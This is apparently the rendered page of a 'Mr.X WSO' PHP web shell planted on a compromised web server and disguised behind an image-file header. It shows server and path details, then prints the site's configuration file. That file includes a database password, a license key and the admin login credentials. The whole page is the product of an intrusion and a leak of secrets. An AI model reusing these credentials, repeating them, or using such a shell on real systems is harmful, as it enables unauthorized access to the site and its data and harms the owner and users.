����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-10 01:28:28 1999.30 GB Free: 64.83 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
/* DATABASE INFORMATION */
$dbserver = 'localhost';
$dbname = 'chatass_ca';
$dbuser = 'chatass_ca';
$dbpass = 'VDL4m6A0cwc9kCLQ';
/* LICENSE KEY */
$licenseKey = "18b4482979799ed2-be121133a86bed72-afed239943a42934-44b1eb6faeed2084-2bebd9caf1f4a4c8-7462e3e0eedfda77-1149e08f0423056a-60443ca1a60cc69c";
/* ADMIN ACCESS */
$admin_username = 'admin'; //admin area username
$admin_password = '+vVL9qFsZryKqpIO/nQRSEPDILw'; //admin area password
/* WEBSITE INFORMATION */
$basepath = '/home/httpd/html/chatass.com/public_html'; //base absolutely linux path
$basehttp = 'https://' . $_SERVER['HTTP_HOST']; //base http path
$mediadomain = $_SERVER['HTTP_HOST'].'/media'; //lighttpd install domain, usually media.domain.com
$misc_path = $basepath . '/media/misc'; //miscelanious image path
$misc_url = 'https://' . $mediadomain . '/misc'; //url to $misc_path
$cache_path = $basepath . '/cache'; //directory for cached files
/* Process admin area variables */
$config = json_decode(file_get_contents($basepath . '/admin/scripts/config.json'), true);
extract($config, EXTR_OVERWRITE);
if(file_exists($basepath . '/admin/scripts/template_config.json')) {
$templateConfig = json_decode(file_get_contents($basepath . '/admin/scripts/template_config.json'), true);
extract($templateConfig, EXTR_OVERWRITE);
}
/* EOF */
$config['display_query_log'] = false;
$config['long_query_time'] = 0.05;
$template_path = $basepath . '/templates/' . $template_name;
$template_url = $basehttp . '/templates/' . $template_name;